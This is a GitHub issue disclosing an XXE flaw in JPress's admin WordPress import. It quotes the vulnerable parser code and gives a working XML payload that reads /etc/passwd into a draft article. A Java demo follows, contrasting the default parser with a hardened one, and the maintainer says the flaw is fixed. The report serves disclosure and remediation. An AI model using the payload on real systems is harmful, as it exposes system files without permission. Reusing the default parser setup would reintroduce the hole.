JPressProjects / jpress

JPress, a site-building tool developed in Java. 100k+ websites currently run on JPress, including several government agencies, 200+ listed companies, the Chinese Academy of Sciences, the Red Cross and others.
http://www.jpress.cn
GNU Lesser General Public License v3.0

Admin back-end XML external entity injection vulnerability #156

Closed hack4money closed 3 years ago

hack4money commented 3 years ago


"System Management" - "System" - "Toolbox" - "WordPress Article Import":

io.jpress.module.article.controller.admin._WordpressImport#doWordPressImport

public void doWordPressImport() {

    UploadFile ufile = getFile();
    if (ufile == null) {
        // "You have not selected a WordPress file yet"
        renderJson(Ret.fail("message", "您还未选择WordPress文件"));
        return;
    }

    // Only the file extension is checked; the content of the XML is not inspected
    if (!".xml".equals(FileUtil.getSuffix(ufile.getFileName()))) {
        // "Please select the XML file exported from WordPress"
        renderJson(Ret.fail("message", "请选择从WordPress导出的XML文件"));
        return;
    }

    String newPath = AttachmentUtils.moveFile(ufile);
    File xmlFile = AttachmentUtils.file(newPath);

    // The uploaded file is handed straight to the SAX parser below
    WordPressXmlParser wordPressXmlParser = new WordPressXmlParser();
    wordPressXmlParser.parse(xmlFile);

    // Parsed article bodies (including any expanded entity text) are stored as articles
    List<Article> contents = wordPressXmlParser.getArticles();
    if (ArrayUtil.isNotEmpty(contents)) {
        doSaveArticles(contents);
    }

    List<Attachment> attachments = wordPressXmlParser.getAttachments();
    if (ArrayUtil.isNotEmpty(attachments)) {
        doSaveAttachements(attachments);
    }

    renderOkJson();
}

io.jpress.module.article.kit.wordpress.WordPressXmlParser#parse

public void parse(File wordpressXml) {
    try {
        // Default SAXParserFactory settings: DOCTYPE declarations are accepted and
        // external general entities (SYSTEM "file:///...") are resolved and expanded
        SAXParserFactory factory = SAXParserFactory.newInstance();
        SAXParser parser = factory.newSAXParser();
        parser.parse(wordpressXml, this);
    } catch (Exception e) {
        log.warn("ConfigParser parser exception", e);
    }

}

Upload a constructed XML file, such as:

<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///etc/passwd">
]>

<item>
<wp:post_type>post</wp:post_type>
<title>2</title>
<content:encoded>&f;</content:encoded>
<wp:status>draft</wp:status>
</item>

The contents of /etc/passwd can then be read in the draft article: [screenshot]
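
The following is an added, self-contained example (not JPress code and not part of the report above) showing the two parser configurations side by side: a factory left at its defaults, which expands the SYSTEM entity exactly as the report describes, and a hardened factory that rejects the DOCTYPE before any entity can be declared. It assumes a temporary file as a stand-in for /etc/passwd, a minimal handler that collects the text of content:encoded, and the feature/property names of the JDK's built-in Xerces parser; the class and method names are hypothetical.

```java
import java.io.File;
import java.io.IOException;
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import javax.xml.XMLConstants;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.Attributes;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

public class XxeImportDemo {

    /** Collects the text of <content:encoded>, mirroring how an importer would pick up an article body. */
    static final class ContentHandler extends DefaultHandler {
        private final StringBuilder text = new StringBuilder();
        private boolean inContent;

        @Override
        public void startElement(String uri, String localName, String qName, Attributes atts) {
            // namespaceAware is false by default, so qName is the raw "content:encoded"
            inContent = "content:encoded".equals(qName);
        }

        @Override
        public void endElement(String uri, String localName, String qName) {
            if ("content:encoded".equals(qName)) inContent = false;
        }

        @Override
        public void characters(char[] ch, int start, int length) {
            if (inContent) text.append(ch, start, length);
        }

        String content() { return text.toString(); }
    }

    /** Factory at its defaults: DOCTYPE accepted, external general entities resolved (the vulnerable shape). */
    static SAXParser vulnerableParser() throws ParserConfigurationException, SAXException {
        return SAXParserFactory.newInstance().newSAXParser();
    }

    /** Hardened factory: refuse DOCTYPE outright, and additionally switch off every external-resource path. */
    static SAXParser hardenedParser() throws ParserConfigurationException, SAXException {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        SAXParser p = f.newSAXParser();
        // JAXP 1.5 properties: empty string = no external DTD/schema access at all
        p.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        p.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return p;
    }

    static String parseContent(SAXParser parser, String xml) throws SAXException, IOException {
        ContentHandler h = new ContentHandler();
        parser.parse(new InputSource(new StringReader(xml)), h);
        return h.content();
    }

    public static void main(String[] args) throws Exception {
        // Constructed secret file standing in for /etc/passwd (assumption: a temp file is readable here)
        File secret = File.createTempFile("xxe-secret", ".txt");
        secret.deleteOnExit();
        Files.write(secret.toPath(), "root:x:0:0:root:/root:/bin/bash\n".getBytes(StandardCharsets.UTF_8));

        // Same shape as the reported payload, pointing at the constructed file instead of /etc/passwd
        String xml = "<?xml version=\"1.0\"?>\n"
            + "<!DOCTYPE ANY [ <!ENTITY f SYSTEM \"" + secret.toURI() + "\"> ]>\n"
            + "<item><wp:post_type>post</wp:post_type><title>2</title>"
            + "<content:encoded>&f;</content:encoded><wp:status>draft</wp:status></item>";

        // Vulnerable configuration: the file contents end up in the article body
        System.out.println("vulnerable: " + parseContent(vulnerableParser(), xml).trim());

        // Hardened configuration: the DOCTYPE itself is rejected, so no entity is ever declared
        try {
            parseContent(hardenedParser(), xml);
            System.out.println("hardened: parsed (unexpected)");
        } catch (SAXException e) {
            System.out.println("hardened: rejected -> " + e.getMessage());
        }
    }
}
```

Disallowing the DOCTYPE is the right fix for this importer because a WordPress WXR export is plain namespaced XML with no DTD, so legitimate uploads are unaffected; the remaining features and the two ACCESS_EXTERNAL properties are defence in depth for parsers that do not honour disallow-doctype-decl.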

JPressProjects commented 3 years ago

Already fixed...